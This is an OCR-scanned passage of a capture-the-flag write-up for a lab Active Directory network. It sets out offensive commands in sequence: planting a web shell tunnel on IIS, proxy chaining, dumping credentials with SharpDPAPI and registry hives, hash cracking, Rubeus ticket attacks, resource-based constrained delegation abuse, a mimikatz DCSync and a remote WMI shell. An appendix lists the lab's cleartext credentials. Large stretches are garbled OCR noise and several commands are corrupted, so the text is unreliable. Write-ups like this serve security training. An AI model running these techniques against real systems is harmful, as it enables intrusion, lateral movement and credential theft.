yetere)) © strings -a slack.blob | grep elliot -A1 cere rats Rt eee TCs Spied Perr fotectias PCE Rett Uae oe Seve ron Centar Aro Cea ae peo Ocoee eee a Seve tamer Pee Kata ata alderson" Reenter me Ceri Ceci Tee mca Ceri Crab ems torr tac ecu OCR su cr UnEE rere LetNeInagain LetNeInagain! Before going further | will build another tunnel to interact with 192.168.11.x network directly from Kali. | could create a path all the way back from MSO1 over DC1 to WEBO1 with SSH or Chisel (as but | feel lazy and will do it another way. There is IIS running on MSO1 which makes it a perfect target for tunneling with nerate the tunnel.aspx backdoor, drop it into \inetpub\wwwroot on MSO1 and start a SOCKS proxy at 192.168.10.6:1337.. Using proxychains (as the name suggests) | will be able to chain multiple proxy servers to reach targets in 192.168.11.x.Neo-reGeorg requires Python 2 as well as the requests module, Iwill download all the dependencies with pip on Kali, zip them and transfer to DC1 $ pip download requests $ zip requests.zip * (On DCI Iwill unzip requests dependencies and install them like follows: cmd > c:\python27\scripts\pip.exe install --no~index --find-Tinks “c:\Users\Administrator\Music\requests” requests Now, back on Kali, | will generate the tunnel. aspx backdoor: $ python neoreg.py generate -k 'snovvcrash. rocks!"ere Tyee rere ened ETI) Se novi Pee amet aby eee ae eRe et *9$9998" Hb 'S8$an PeSeeG Cone SMM att ss Eiger Parmer! aren te ceca ppreismrsesn per Fer) cece) erstamrrct rae Bastar) Rigen) Ceres tetera erates eo] pyaar eet Serra ers epee Seem) RT Warr stssetsae re) eee ee atime tse Lner er ee SE Cer PS C:\Users\Adainistrator\music> upload Neo-reseorg/nenre; Harmacy tna eerie y ereea mart eeeCre Teeter ssfult ee ee ten Cem et eee eee coe ea pieerieeneesy seston seat: Then | will upload all the files to their places and run neoreg. py on DC1 cnd > sep -P 2222 tunnel aspx negaairline. local\[email protected],1:"C:\inetpub\wwroot\ tunnel .aspx" end > c:\Python27\scripts\python.exe .\neoreg.py -k snovverash. rocks! -u http: //msO1.megaairline, Tocal/tunnel .aspx -1 0.0.0.0 -p 1337(On Kali | will make 2 copy of proxychains config in CWD, modify it to use a chain of 2 proxies and verify elliot's local password with CME: $ proxychains4 -f proxychains4,conf cme smb 192,168.11.210 -u elliot -p "Letweznagain!' Jocal-auth ey Perey We don't receive "Pwn3d!" here due to UAC token filtering (elliot is not the RID 500 local admin), but as we saw earlier he is a member of local administrators group. L will ROP into MSO1 and grab the fifth flag: $ proxychains4 -q -f ./proxychains4.conf xfreerdp /u:'elliot' /p:'Letmernagain!* /v:192-168.11.210 /dynamic-resolution +clipboard /drive:share, /none/snowvcrash/htb/endgames/ascension/wawASCENSION{sL4ckIng_On_*¥¥#*#48844} 7. Maverick Being the local administrator on MS01, | will exfiltrate some extra creds with SharpDPAPI (again).Iwill also grab SAM, SYSTEM and SECURITY registry hives and decrypt other local secrets, ro oT Sse ec reece Ta Pere ero att PR cree Performing Credential for the builtin administra$ hashcat64.exe -m 2100 hashes/htb w ~-usernane & snowverath@snoevrath-OT-WIte/mnt/e/Programs/hachcat Caer res IMEGAATRLINE. LOCAL /anna: fer Eerie eee comet Observing anna’s privileges in Bloodhound, the rest turns out to be trivial - RBCD's coming! | Axseino —_onseeconseators Reese cL Rete ere a ton cea Soe oem ea yeaa am not able to authenticate nether from MS01 or from DC2 as MEGAAIRLINE\anna due to some policy re: ictions (runas /netonly or does not work either), so | will have to figure out the way to use anna's creds. Ican use asktgt in this situation to request Kerberos TGT and legitimately impersonate anna via Pass-the-Ticket. | also thought that doing Overpass-the-Hash with Mimikatz sekurlsa::pth will work, but it does not seem it does.| suppose the Mimikatz approach fails due to the nature of sekur?sa: :pth module which injects the hash directly into LSASS memory, when Rubeus "causes the normal Kerberos authentication process to kick off as normal as if the user had normally logged on, turning the supplied hash into a fully-fledged TGT" (ce) Anyways, now I can do all the RBCD stuff right from DC1.daedalus.tocal cnd > .\Rubeus.exe asktgt /domain:megaairline.local /de:de2 /user:anna /password: FWErfsgt4ghd7 Fédwx /createnetonly:C:\windows\system32\windowsPowershel]\v1.0\powershel] .exe /show PS > . .\powermad.psi PS >. .\powerview4-psi PS > New-Machineaccount -MachineAccount iLovePizza -Password $(convertTo- Securestring 'Passw0rd!' -AsPlainText -Force) -Verbose -Domain megaairline. local “Domaincontrol ler DC2.megaairline. local PS > Set-DomainRBCb DC2 -Delegaterrom iLovePizza -vomain megaairline.local - Server DC2.megaairline.local -verbose PS > .\Rubeus.exe s4u /domain:megaairline.local /de:0c2 /user:iLovePizza /ec4:FC525C9683E8FE0670958A200C971889 /impersonateuser: administrator /nsdsspn:CIFS/DC2-megaairline.local /ptt /nowrap PS > cd \\de2.megaairline.Tocal\c$ Ps > cr PS > .\Rubeus.exe s4u /domain:megaairline.local /dc:0¢2 /user:iLovePizza /rc: FC525C9683E8FE067095BA2000971889 /impersonateuser: administrator /nsdsspn:CIFS/OC2.megaairline.local /altservice:LDAP /ptt /nowrap PS > .\mimikatz.exe "log desync.txt" "Isadunp::desyne /domain:megaairline. local /user:administrator /al1 /evs" "exit"Having obtained the full DCSync dump, | can use impacket to log into DC2 through double hop proxy via WMI$ proxychains4 -f ./proxychains4.conf wmiexec.py MEGAATRLINE/admini [email protected] hashes :674F1aSc73f4faad8ddbf7F3bF86d060 -shel1-type powershel1 @ Feature. Check out the -she1I-type feature of mine to spawn a PowerShell shell via impacket's exec py scripts! 'Flag ASCENSION(g0t_all_*##*##4#} Appendix A. Creds MsSQL:daedalus :L3tm3FlyUpH1gh MSSQL:sa:MySAisL33TM4n WEBOL\svc_dev:a2W@rwalzc+zared WEBO1\Admi ni strator: ExuLyX_WtHXx9ps9 DAEDALUS\bi11ing_user:043d4Tus@111 IngeOSS DAEDALUS\svc_backup: jkQXAnHkj#7w#Xs$ DAEDALUS\e11iot :84@m!n@9 DAEDALUS\Admini strator:pleasefastenyourseatbelts01! MEGAAIRLINES\e11iot:84@m!n@9 MSOL\e11 jot: Letmernagain! MsO1\Administrator:Fwerfsgt4ghd7 f6dwx MEGAATRLINES\anna: FWErfsgt4ghd7f6dux